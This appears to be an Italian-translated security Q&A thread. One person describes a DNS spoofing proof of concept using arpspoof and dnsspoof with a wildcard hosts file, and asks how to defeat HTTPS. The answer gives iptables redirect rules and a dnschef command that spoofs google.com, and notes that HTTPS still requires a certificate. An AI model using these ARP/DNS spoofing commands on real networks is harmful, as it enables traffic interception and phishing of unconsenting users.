Come dnsspoof contro HTTPS

Naviga le tue risposte
-2

Sto facendo un dnsspoof PoC, ma a quanto pare non funziona con HTTPS a causa del certificato. Per favore non dirmi che devo generare un certificato o inviare un certificato legittimo, voglio soluzioni reali, comandi, azioni.

Questo è quello che faccio il momento: 

arpspoof -i eth0 -t <target> <router>

dnsspoof -i eth0 -f hosts

e questo è il mio file hosts : 

<myip> *.*.*
<myip> *.*
<myip> *.*.*.*

Sto utilizzando il server Apache, quindi la vittima viene reindirizzata a una mia pagina index.html, ma solo HTTP.

    
posta aDoN 15.10.2015 - 17:48
fonte

1 risposta

1

Puoi spoofare il DNS usando DNSchef per esempio. Prima di poter iniziare, devi configurare correttamente il tuo modulo netfilter di iptables per accettare le richieste DNS e per reindirizzarle al tuo host in modo imparziale dall'ip di destinazione. 

iptables -A INPUT -i eth0 -p udp --dport 53 -j ACCEPT
iptables -A PREROUTING -t nat -i eth0 -p udp --dport 53 -j REDIRECT --to-port 53

Quindi avvia DNSChef 

dnschef --fakeip <your ip> --fakedomains google.com

Ciò reindirizza tutto il traffico di google.com e tutti i sottodomini al tuo ip.

In ogni caso, questo non ti porta in giro con HTTPS. Quando l'utente digita esplicitamente link per esapillare la richiesta arriverà al tuo fakeip ma si aspetta comunque SSL. Allora hai bisogno di un certificato comunque.

    
risposta data 15.10.2015 - 18:59
fonte

Leggi altre domande sui tag

VPN, server proxy e TOR possono eludere / rimuovere il Fingerprinting del browser in termini di anonimato? [duplicare] facebook notifica dannosa 12.12.2015 [duplicato]